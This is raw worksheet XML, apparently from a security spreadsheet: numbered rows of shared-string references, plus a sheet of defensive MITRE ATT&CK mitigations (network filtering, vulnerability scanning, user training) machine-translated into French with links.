      <c r="C597" s="2" t="s">
        <v>1787</v>
      </c>
      <c r="D597" s="2" t="s">
        <v>1786</v>
      </c>
    </row>
    <row r="598" spans="1:4" ht="144" x14ac:dyDescent="0.3">
      <c r="A598" t="s">
        <v>1788</v>
      </c>
      <c r="B598" s="2" t="s">
        <v>1789</v>
      </c>
      <c r="C598" s="2" t="s">
        <v>1790</v>
      </c>
      <c r="D598" s="2" t="s">
        <v>2628</v>
      </c>
    </row>
    <row r="599" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A599" t="s">
        <v>1791</v>
      </c>
      <c r="B599" s="2" t="s">
        <v>1792</v>
      </c>
      <c r="C599" s="2" t="s">
        <v>1793</v>
      </c>
      <c r="D599" s="2" t="s">
        <v>2629</v>
      </c>
    </row>
    <row r="600" spans="1:4" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A600" t="s">
        <v>1794</v>
      </c>
      <c r="B600" s="2" t="s">
        <v>1795</v>
      </c>
      <c r="C600" s="2" t="s">
        <v>1796</v>
      </c>
      <c r="D600" s="2" t="s">
        <v>2630</v>
      </c>
    </row>
    <row r="601" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A601" t="s">
        <v>1797</v>
      </c>
      <c r="B601" s="2" t="s">
        <v>1798</v>
      </c>
      <c r="C601" s="2" t="s">
        <v>1799</v>
      </c>
      <c r="D601" s="2" t="s">
        <v>2631</v>
      </c>
    </row>
    <row r="602" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A602" t="s">
        <v>1800</v>
      </c>
      <c r="B602" s="2" t="s">
        <v>1801</v>
      </c>
      <c r="C602" s="2" t="s">
        <v>1802</v>
      </c>
      <c r="D602" s="2" t="s">
        <v>2632</v>
      </c>
    </row>
    <row r="603" spans="1:4" ht="201.6" x14ac:dyDescent="0.3">
      <c r="A603" t="s">
        <v>1803</v>
      </c>
      <c r="B603" s="2" t="s">
        <v>1804</v>
      </c>
      <c r="C603" s="2" t="s">
        <v>1805</v>
      </c>
      <c r="D603" s="2" t="s">
        <v>2633</v>
      </c>
    </row>
    <row r="604" spans="1:4" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A604" t="s">
        <v>1806</v>
      </c>
      <c r="B604" s="2" t="s">
        <v>1807</v>
      </c>
      <c r="C604" s="2" t="s">
        <v>1808</v>
      </c>
      <c r="D604" s="2" t="s">
        <v>2634</v>
      </c>
    </row>
    <row r="605" spans="1:4" ht="201.6" x14ac:dyDescent="0.3">
      <c r="A605" t="s">
        <v>1809</v>
      </c>
      <c r="B605" s="2" t="s">
        <v>1810</v>
      </c>
      <c r="C605" s="2" t="s">
        <v>1811</v>
      </c>
      <c r="D605" s="2" t="s">
        <v>2635</v>
      </c>
    </row>
    <row r="606" spans="1:4" ht="316.8" x14ac:dyDescent="0.3">
      <c r="A606" t="s">
        <v>1812</v>
      </c>
      <c r="B606" s="2" t="s">
        <v>1813</v>
      </c>
      <c r="C606" s="2" t="s">
        <v>1814</v>
      </c>
      <c r="D606" s="2" t="s">
        <v>2636</v>
      </c>
    </row>
    <row r="607" spans="1:4" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A607" t="s">
        <v>1815</v>
      </c>
      <c r="B607" s="2" t="s">
        <v>1816</v>
      </c>
      <c r="C607" s="2" t="s">
        <v>1817</v>
      </c>
      <c r="D607" s="2" t="s">
        <v>2637</v>
      </c>
    </row>
    <row r="608" spans="1:4" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A608" t="s">
        <v>1818</v>
      </c>
      <c r="B608" s="2" t="s">
        <v>1819</v>
      </c>
      <c r="C608" s="2" t="s">
        <v>1820</v>
      </c>
      <c r="D608" s="2" t="s">
        <v>2638</v>
      </c>
    </row>
    <row r="609" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A609" t="s">
        <v>1821</v>
      </c>
      <c r="B609" s="2" t="s">
        <v>1822</v>
      </c>
      <c r="C609" s="2" t="s">
        <v>1823</v>
      </c>
      <c r="D609" s="2" t="s">
        <v>2639</v>
      </c>
    </row>
    <row r="610" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A610" t="s">
        <v>1824</v>
      </c>
      <c r="B610" s="2" t="s">
        <v>1825</v>
      </c>
      <c r="C610" s="2" t="s">
        <v>1826</v>
      </c>
      <c r="D610" s="2" t="s">
        <v>2640</v>
      </c>
    </row>
    <row r="611" spans="1:4" ht="144" x14ac:dyDescent="0.3">
      <c r="A611" t="s">
        <v>1827</v>
      </c>
      <c r="B611" s="2" t="s">
        <v>1828</v>
      </c>
      <c r="C611" s="2" t="s">
        <v>1829</v>
      </c>
      <c r="D611" s="2" t="s">
        <v>2641</v>
      </c>
    </row>
    <row r="612" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A612" t="s">
        <v>1830</v>
      </c>
      <c r="B612" s="2" t="s">
        <v>1831</v>
      </c>
      <c r="C612" s="2" t="s">
        <v>1832</v>
      </c>
      <c r="D612" s="2" t="s">
        <v>2642</v>
      </c>
    </row>
    <row r="613" spans="1:4" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A613" t="s">
        <v>1833</v>
      </c>
      <c r="B613" s="2" t="s">
        <v>1834</v>
      </c>
      <c r="C613" s="2" t="s">
        <v>1835</v>
      </c>
      <c r="D613" s="2" t="s">
        <v>1834</v>
      </c>
    </row>
    <row r="614" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A614" t="s">
        <v>1836</v>
      </c>
      <c r="B614" s="2" t="s">
        <v>1837</v>
      </c>
      <c r="C614" s="2" t="s">
        <v>1838</v>
      </c>
      <c r="D614" s="2" t="s">
        <v>2643</v>
      </c>
    </row>
    <row r="615" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A615" t="s">
        <v>1839</v>
      </c>
      <c r="B615" s="2" t="s">
        <v>1494</v>
      </c>
      <c r="C615" s="2" t="s">
        <v>1840</v>
      </c>
      <c r="D615" s="2" t="s">
        <v>2541</v>
      </c>
    </row>
    <row r="616" spans="1:4" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A616" t="s">
        <v>1841</v>
      </c>
      <c r="B616" s="2" t="s">
        <v>1842</v>
      </c>
      <c r="C616" s="2" t="s">
        <v>1843</v>
      </c>
      <c r="D616" s="2" t="s">
        <v>2644</v>
      </c>
    </row>
    <row r="617" spans="1:4" ht="259.2" x14ac:dyDescent="0.3">
      <c r="A617" t="s">
        <v>1844</v>
      </c>
      <c r="B617" s="2" t="s">
        <v>1845</v>
      </c>
      <c r="C617" s="2" t="s">
        <v>1846</v>
      </c>
      <c r="D617" s="2" t="s">
        <v>2645</v>
      </c>
    </row>
    <row r="618" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A618" t="s">
        <v>1847</v>
      </c>
      <c r="B618" s="2" t="s">
        <v>1848</v>
      </c>
      <c r="C618" s="2" t="s">
        <v>1849</v>
      </c>
      <c r="D618" s="2" t="s">
        <v>2646</v>
      </c>
    </row>
    <row r="619" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A619" t="s">
        <v>1850</v>
      </c>
      <c r="B619" s="2" t="s">
        <v>1851</v>
      </c>
      <c r="C619" s="2" t="s">
        <v>1852</v>
      </c>
      <c r="D619" s="2" t="s">
        <v>2647</v>
      </c>
    </row>
    <row r="620" spans="1:4" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A620" t="s">
        <v>1853</v>
      </c>
      <c r="B620" s="2" t="s">
        <v>567</v>
      </c>
      <c r="C620" s="2" t="s">
        <v>1854</v>
      </c>
      <c r="D620" s="2" t="s">
        <v>2263</v>
      </c>
    </row>
    <row r="621" spans="1:4" ht="259.2" x14ac:dyDescent="0.3">
      <c r="A621" t="s">
        <v>1855</v>
      </c>
      <c r="B621" s="2" t="s">
        <v>1856</v>
      </c>
      <c r="C621" s="2" t="s">
        <v>1857</v>
      </c>
      <c r="D621" s="2" t="s">
        <v>2648</v>
      </c>
    </row>
    <row r="622" spans="1:4" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A622" t="s">
        <v>1858</v>
      </c>
      <c r="B622" s="2" t="s">
        <v>1859</v>
      </c>
      <c r="C622" s="2" t="s">
        <v>1860</v>
      </c>
      <c r="D622" s="2" t="s">
        <v>2649</v>
      </c>
    </row>
    <row r="623" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A623" t="s">
        <v>1861</v>
      </c>
      <c r="B623" s="2" t="s">
        <v>1862</v>
      </c>
      <c r="C623" s="2" t="s">
        <v>1863</v>
      </c>
      <c r="D623" s="2" t="s">
        <v>2650</v>
      </c>
    </row>
    <row r="624" spans="1:4" ht="216" x14ac:dyDescent="0.3">
      <c r="A624" t="s">
        <v>1864</v>
      </c>
      <c r="B624" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="C624" s="2" t="s">
        <v>1866</v>
      </c>
      <c r="D624" s="2" t="s">
        <v>1865</v>
      </c>
    </row>
    <row r="625" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A625" t="s">
        <v>1867</v>
      </c>
      <c r="B625" s="2" t="s">
        <v>1868</v>
      </c>
      <c r="C625" s="2" t="s">
        <v>1869</v>
      </c>
      <c r="D625" s="2" t="s">
        <v>1868</v>
      </c>
    </row>
    <row r="626" spans="1:4" ht="201.6" x14ac:dyDescent="0.3">
      <c r="A626" t="s">
        <v>1870</v>
      </c>
      <c r="B626" s="2" t="s">
        <v>1871</v>
      </c>
      <c r="C626" s="2" t="s">
        <v>1872</v>
      </c>
      <c r="D626" s="2" t="s">
        <v>2651</v>
      </c>
    </row>
    <row r="627" spans="1:4" ht="216" x14ac:dyDescent="0.3">
      <c r="A627" t="s">
        <v>1873</v>
      </c>
      <c r="B627" s="2" t="s">
        <v>1874</v>
      </c>
      <c r="C627" s="2" t="s">
        <v>1875</v>
      </c>
      <c r="D627" s="2" t="s">
        <v>2652</v>
      </c>
    </row>
    <row r="628" spans="1:4" ht="201.6" x14ac:dyDescent="0.3">
      <c r="A628" t="s">
        <v>1876</v>
      </c>
      <c r="B628" s="2" t="s">
        <v>1877</v>
      </c>
      <c r="C628" s="2" t="s">
        <v>1878</v>
      </c>
      <c r="D628" s="2" t="s">
        <v>2653</v>
      </c>
    </row>
    <row r="629" spans="1:4" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A629" t="s">
        <v>1879</v>
      </c>
      <c r="B629" s="2" t="s">
        <v>1434</v>
      </c>
      <c r="C629" s="2" t="s">
        <v>1880</v>
      </c>
      <c r="D629" s="2" t="s">
        <v>1434</v>
      </c>
    </row>
    <row r="630" spans="1:4" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A630" t="s">
        <v>1881</v>
      </c>
      <c r="B630" s="2" t="s">
        <v>1882</v>
      </c>
      <c r="C630" s="2" t="s">
        <v>1883</v>
      </c>
      <c r="D630" s="2" t="s">
        <v>2654</v>
      </c>
    </row>
    <row r="631" spans="1:4" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A631" t="s">
        <v>1884</v>
      </c>
      <c r="B631" s="2" t="s">
        <v>1885</v>
      </c>
      <c r="C631" s="2" t="s">
        <v>1886</v>
      </c>
      <c r="D631" s="2" t="s">
        <v>2655</v>
      </c>
    </row>
    <row r="632" spans="1:4" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A632" t="s">
        <v>1887</v>
      </c>
      <c r="B632" s="2" t="s">
        <v>1888</v>
      </c>
      <c r="C632" s="2" t="s">
        <v>1889</v>
      </c>
      <c r="D632" s="2" t="s">
        <v>2656</v>
      </c>
    </row>
    <row r="633" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A633" t="s">
        <v>1890</v>
      </c>
      <c r="B633" s="2" t="s">
        <v>1891</v>
      </c>
      <c r="C633" s="2" t="s">
        <v>1892</v>
      </c>
      <c r="D633" s="2" t="s">
        <v>2657</v>
      </c>
    </row>
    <row r="634" spans="1:4" ht="288" x14ac:dyDescent="0.3">
      <c r="A634" t="s">
        <v>1893</v>
      </c>
      <c r="B634" s="2" t="s">
        <v>1894</v>
      </c>
      <c r="C634" s="2" t="s">
        <v>1895</v>
      </c>
      <c r="D634" s="2" t="s">
        <v>2658</v>
      </c>
    </row>
    <row r="635" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A635" t="s">
        <v>1896</v>
      </c>
      <c r="B635" s="2" t="s">
        <v>1897</v>
      </c>
      <c r="C635" s="2" t="s">
        <v>1898</v>
      </c>
      <c r="D635" s="2" t="s">
        <v>2659</v>
      </c>
    </row>
    <row r="636" spans="1:4" ht="144" x14ac:dyDescent="0.3">
      <c r="A636" t="s">
        <v>1899</v>
      </c>
      <c r="B636" s="2" t="s">
        <v>1900</v>
      </c>
      <c r="C636" s="2" t="s">
        <v>1901</v>
      </c>
      <c r="D636" s="2" t="s">
        <v>1900</v>
      </c>
    </row>
    <row r="637" spans="1:4" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A637" t="s">
        <v>1902</v>
      </c>
      <c r="B637" s="2" t="s">
        <v>1903</v>
      </c>
      <c r="C637" s="2" t="s">
        <v>1904</v>
      </c>
      <c r="D637" s="2" t="s">
        <v>2660</v>
      </c>
    </row>
    <row r="638" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A638" t="s">
        <v>1905</v>
      </c>
      <c r="B638" s="2" t="s">
        <v>1906</v>
      </c>
      <c r="C638" s="2" t="s">
        <v>1907</v>
      </c>
      <c r="D638" s="2" t="s">
        <v>2661</v>
      </c>
    </row>
    <row r="639" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A639" t="s">
        <v>1908</v>
      </c>
      <c r="B639" s="2" t="s">
        <v>1909</v>
      </c>
      <c r="C639" s="2" t="s">
        <v>1910</v>
      </c>
      <c r="D639" s="2" t="s">
        <v>2662</v>
      </c>
    </row>
    <row r="640" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A640" t="s">
        <v>1911</v>
      </c>
      <c r="B640" s="2" t="s">
        <v>1912</v>
      </c>
      <c r="C640" s="2" t="s">
        <v>1913</v>
      </c>
      <c r="D640" s="2" t="s">
        <v>2663</v>
      </c>
    </row>
    <row r="641" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A641" t="s">
        <v>1914</v>
      </c>
      <c r="B641" s="2" t="s">
        <v>1915</v>
      </c>
      <c r="C641" s="2" t="s">
        <v>1916</v>
      </c>
      <c r="D641" s="2" t="s">
        <v>1915</v>
      </c>
    </row>
    <row r="642" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A642" t="s">
        <v>1917</v>
      </c>
      <c r="B642" s="2" t="s">
        <v>1918</v>
      </c>
      <c r="C642" s="2" t="s">
        <v>1919</v>
      </c>
      <c r="D642" s="2" t="s">
        <v>2664</v>
      </c>
    </row>
    <row r="643" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A643" t="s">
        <v>1920</v>
      </c>
      <c r="B643" s="2" t="s">
        <v>597</v>
      </c>
      <c r="C643" s="2" t="s">
        <v>1921</v>
      </c>
      <c r="D643" s="2" t="s">
        <v>2273</v>
      </c>
    </row>
    <row r="644" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A644" t="s">
        <v>1922</v>
      </c>
      <c r="B644" s="2" t="s">
        <v>1923</v>
      </c>
      <c r="C644" s="2" t="s">
        <v>1924</v>
      </c>
      <c r="D644" s="2" t="s">
        <v>2665</v>
      </c>
    </row>
    <row r="645" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A645" t="s">
        <v>1925</v>
      </c>
      <c r="B645" s="2" t="s">
        <v>1926</v>
      </c>
      <c r="C645" s="2" t="s">
        <v>1927</v>
      </c>
      <c r="D645" s="2" t="s">
        <v>2666</v>
      </c>
    </row>
    <row r="646" spans="1:4" ht="144" x14ac:dyDescent="0.3">
      <c r="A646" t="s">
        <v>1928</v>
      </c>
      <c r="B646" s="2" t="s">
        <v>1929</v>
      </c>
      <c r="C646" s="2" t="s">
        <v>1930</v>
      </c>
      <c r="D646" s="2" t="s">
        <v>2667</v>
      </c>
    </row>
    <row r="647" spans="1:4" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A647" t="s">
        <v>1931</v>
      </c>
      <c r="B647" s="2" t="s">
        <v>1932</v>
      </c>
      <c r="C647" s="2" t="s">
        <v>1933</v>
      </c>
      <c r="D647" s="2" t="s">
        <v>2668</v>
      </c>
    </row>
    <row r="648" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A648" t="s">
        <v>1934</v>
      </c>
      <c r="B648" s="2" t="s">
        <v>1935</v>
      </c>
      <c r="C648" s="2" t="s">
        <v>1936</v>
      </c>
      <c r="D648" s="2" t="s">
        <v>2669</v>
      </c>
    </row>
    <row r="649" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A649" t="s">
        <v>1937</v>
      </c>
      <c r="B649" s="2" t="s">
        <v>1938</v>
      </c>
      <c r="C649" s="2" t="s">
        <v>1939</v>
      </c>
      <c r="D649" s="2" t="s">
        <v>2670</v>
      </c>
    </row>
    <row r="650" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A650" t="s">
        <v>1940</v>
      </c>
      <c r="B650" s="2" t="s">
        <v>1941</v>
      </c>
      <c r="C650" s="2" t="s">
        <v>1942</v>
      </c>
      <c r="D650" s="2" t="s">
        <v>2671</v>
      </c>
    </row>
    <row r="651" spans="1:4" ht="72" x14ac:dyDescent="0.3">
      <c r="A651" t="s">
        <v>1943</v>
      </c>
      <c r="B651" s="2" t="s">
        <v>1944</v>
      </c>
      <c r="C651" s="2" t="s">
        <v>1945</v>
      </c>
      <c r="D651" s="2" t="s">
        <v>2672</v>
      </c>
    </row>
    <row r="652" spans="1:4" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A652" t="s">
        <v>1946</v>
      </c>
      <c r="B652" s="2" t="s">
        <v>1947</v>
      </c>
      <c r="C652" s="2" t="s">
        <v>1948</v>
      </c>
      <c r="D652" s="2" t="s">
        <v>2673</v>
      </c>
    </row>
    <row r="653" spans="1:4" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A653" t="s">
        <v>1949</v>
      </c>
      <c r="B653" s="2" t="s">
        <v>1950</v>
      </c>
      <c r="C653" s="2" t="s">
        <v>1951</v>
      </c>
      <c r="D653" s="2" t="s">
        <v>2674</v>
      </c>
    </row>
    <row r="654" spans="1:4" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A654" t="s">
        <v>1952</v>
      </c>
      <c r="B654" s="2" t="s">
        <v>1953</v>
      </c>
      <c r="C654" s="2" t="s">
        <v>1954</v>
      </c>
      <c r="D654" s="2" t="s">
        <v>2675</v>
      </c>
    </row>
    <row r="655" spans="1:4" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A655" t="s">
        <v>1955</v>
      </c>
      <c r="B655" s="2" t="s">
        <v>1956</v>
      </c>
      <c r="C655" s="2" t="s">
        <v>1957</v>
      </c>
      <c r="D655" s="2" t="s">
        <v>1956</v>
      </c>
    </row>
    <row r="656" spans="1:4" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A656" t="s">
        <v>1958</v>
      </c>
      <c r="B656" s="2" t="s">
        <v>1959</v>
      </c>
      <c r="C656" s="2" t="s">
        <v>1960</v>
      </c>
      <c r="D656" s="2" t="s">
        <v>2676</v>
      </c>
    </row>
    <row r="657" spans="1:4" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A657" t="s">
        <v>1961</v>
      </c>
      <c r="B657" s="2" t="s">
        <v>1962</v>
      </c>
      <c r="C657" s="2" t="s">
        <v>1963</v>
      </c>
      <c r="D657" s="2" t="s">
        <v>1962</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <ignoredErrors>
    <ignoredError sqref="D2:D3 D5:D657 E2 E3:E105"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4" sqref="B4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.88671875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="2" max="2" width="35" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A1" t="s">
        <v>0</v>
      </c>
      <c r="B1" t="s">
        <v>1964</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>19</v>
      </c>
      <c r="B2" t="s">
        <v>1965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5"/>
  <sheetViews>
    <sheetView zoomScale="70" zoomScaleNormal="70" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="G1" sqref="G1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.88671875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="10.6640625" customWidth="1"/>
    <col min="2" max="2" width="36.21875" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="16.44140625" customWidth="1"/>
    <col min="4" max="4" width="13.21875" customWidth="1"/>
    <col min="5" max="5" width="185.6640625" style="2" customWidth="1"/>
    <col min="6" max="6" width="36.21875" style="2" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="185.6640625" style="2" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="15.6" x14ac:dyDescent="0.3">
      <c r="A1" s="1" t="s">
        <v>7</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>1966</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>1967</v>
      </c>
      <c r="E1" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F1" s="3" t="s">
        <v>2103</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>2104</v>
      </c>
    </row>
    <row r="2" spans="1:7" ht="31.2" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>1968</v>
      </c>
      <c r="B2" t="s">
        <v>1969</v>
      </c>
      <c r="C2" t="s">
        <v>1970</v>
      </c>
      <c r="D2" t="s">
        <v>1971</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>1972</v>
      </c>
      <c r="F2" s="5" t="s">
        <v>2678</v>
      </c>
      <c r="G2" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez des signatures de détection d’intrusion pour bloquer le trafic aux limites du réseau.
https://attack.mitre.org/mitigations/M1031</v>
      </c>
    </row>
    <row r="3" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A3" t="s">
        <v>1973</v>
      </c>
      <c r="B3" t="s">
        <v>744</v>
      </c>
      <c r="C3" t="s">
        <v>1970</v>
      </c>
      <c r="D3" t="s">
        <v>1971</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>1974</v>
      </c>
      <c r="F3" s="2" t="s">
        <v>2319</v>
      </c>
      <c r="G3" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>L’analyse des vulnérabilités est utilisée pour trouver des vulnérabilités logicielles potentiellement exploitables afin d’y remédier.
https://attack.mitre.org/mitigations/M1016</v>
      </c>
    </row>
    <row r="4" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A4" t="s">
        <v>1975</v>
      </c>
      <c r="B4" t="s">
        <v>1976</v>
      </c>
      <c r="C4" t="s">
        <v>1977</v>
      </c>
      <c r="D4" t="s">
        <v>1971</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>1978</v>
      </c>
      <c r="F4" s="2" t="s">
        <v>2679</v>
      </c>
      <c r="G4" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêchez l’accès aux partages de fichiers, l’accès à distance aux systèmes, les services inutiles. Les mécanismes de limitation de l’accès peuvent inclure l’utilisation de concentrateurs de réseau, de passerelles RDP, etc.
https://attack.mitre.org/mitigations/M1035</v>
      </c>
    </row>
    <row r="5" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A5" t="s">
        <v>1979</v>
      </c>
      <c r="B5" t="s">
        <v>1980</v>
      </c>
      <c r="C5" t="s">
        <v>1977</v>
      </c>
      <c r="D5" t="s">
        <v>1971</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>1981</v>
      </c>
      <c r="F5" s="2" t="s">
        <v>2680</v>
      </c>
      <c r="G5" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez le stockage à distance des journaux de sécurité et des fichiers sensibles dont l’accès peut être mieux contrôlé afin d’éviter l’exposition des données du journal de détection d’intrusion ou des informations sensibles.
https://attack.mitre.org/mitigations/M1029</v>
      </c>
    </row>
    <row r="6" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A6" t="s">
        <v>1982</v>
      </c>
      <c r="B6" t="s">
        <v>1983</v>
      </c>
      <c r="C6" t="s">
        <v>1977</v>
      </c>
      <c r="D6" t="s">
        <v>1971</v>
      </c>
      <c r="E6" s="2" t="s">
        <v>1984</v>
      </c>
      <c r="F6" s="2" t="s">
        <v>2681</v>
      </c>
      <c r="G6" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez des appliances réseau pour filtrer le trafic entrant ou sortant et effectuer un filtrage basé sur le protocole. Configurez le logiciel sur les points de terminaison pour filtrer le trafic réseau.
https://attack.mitre.org/mitigations/M1037</v>
      </c>
    </row>
    <row r="7" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A7" t="s">
        <v>1985</v>
      </c>
      <c r="B7" t="s">
        <v>1986</v>
      </c>
      <c r="C7" t="s">
        <v>1977</v>
      </c>
      <c r="D7" t="s">
        <v>1971</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>1987</v>
      </c>
      <c r="F7" s="2" t="s">
        <v>2682</v>
      </c>
      <c r="G7" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Restreindre l’utilisation de certains sites Web, bloquer les téléchargements/pièces jointes, bloquer Javascript, restreindre les extensions de navigateur, etc.
https://attack.mitre.org/mitigations/M1021</v>
      </c>
    </row>
    <row r="8" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A8" t="s">
        <v>1988</v>
      </c>
      <c r="B8" t="s">
        <v>1989</v>
      </c>
      <c r="C8" t="s">
        <v>1977</v>
      </c>
      <c r="D8" t="s">
        <v>1971</v>
      </c>
      <c r="E8" s="2" t="s">
        <v>1990</v>
      </c>
      <c r="F8" s="2" t="s">
        <v>2683</v>
      </c>
      <c r="G8" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêcher les utilisateurs ou les groupes d’installer des logiciels non approuvés.
https://attack.mitre.org/mitigations/M1033</v>
      </c>
    </row>
    <row r="9" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A9" t="s">
        <v>1991</v>
      </c>
      <c r="B9" t="s">
        <v>1992</v>
      </c>
      <c r="C9" t="s">
        <v>1993</v>
      </c>
      <c r="D9" t="s">
        <v>1971</v>
      </c>
      <c r="E9" s="2" t="s">
        <v>1994</v>
      </c>
      <c r="F9" s="2" t="s">
        <v>2684</v>
      </c>
      <c r="G9" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Cette atténuation décrit toutes les orientations ou formations données aux développeurs d’applications pour éviter d’introduire des faiblesses de sécurité dont un adversaire peut tirer parti.
https://attack.mitre.org/mitigations/M1013</v>
      </c>
    </row>
    <row r="10" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A10" t="s">
        <v>1995</v>
      </c>
      <c r="B10" t="s">
        <v>1996</v>
      </c>
      <c r="C10" t="s">
        <v>1977</v>
      </c>
      <c r="D10" t="s">
        <v>1971</v>
      </c>
      <c r="E10" s="2" t="s">
        <v>1997</v>
      </c>
      <c r="F10" s="2" t="s">
        <v>2685</v>
      </c>
      <c r="G10" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêcher des utilisateurs ou des groupes d’installer ou d’utiliser du matériel non approuvé sur des systèmes, y compris des périphériques USB.
https://attack.mitre.org/mitigations/M1034</v>
      </c>
    </row>
    <row r="11" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A11" t="s">
        <v>1998</v>
      </c>
      <c r="B11" t="s">
        <v>1999</v>
      </c>
      <c r="C11" t="s">
        <v>1993</v>
      </c>
      <c r="D11" t="s">
        <v>1971</v>
      </c>
      <c r="E11" s="2" t="s">
        <v>2000</v>
      </c>
      <c r="F11" s="2" t="s">
        <v>2686</v>
      </c>
      <c r="G11" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Former les utilisateurs à être conscients des tentatives d’accès ou de manipulation par un adversaire afin de réduire le risque de spearphishing, d’ingénierie sociale et d’autres techniques impliquant une interaction avec l’utilisateur.
https://attack.mitre.org/mitigations/M1017</v>
      </c>
    </row>
    <row r="12" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A12" t="s">
        <v>2001</v>
      </c>
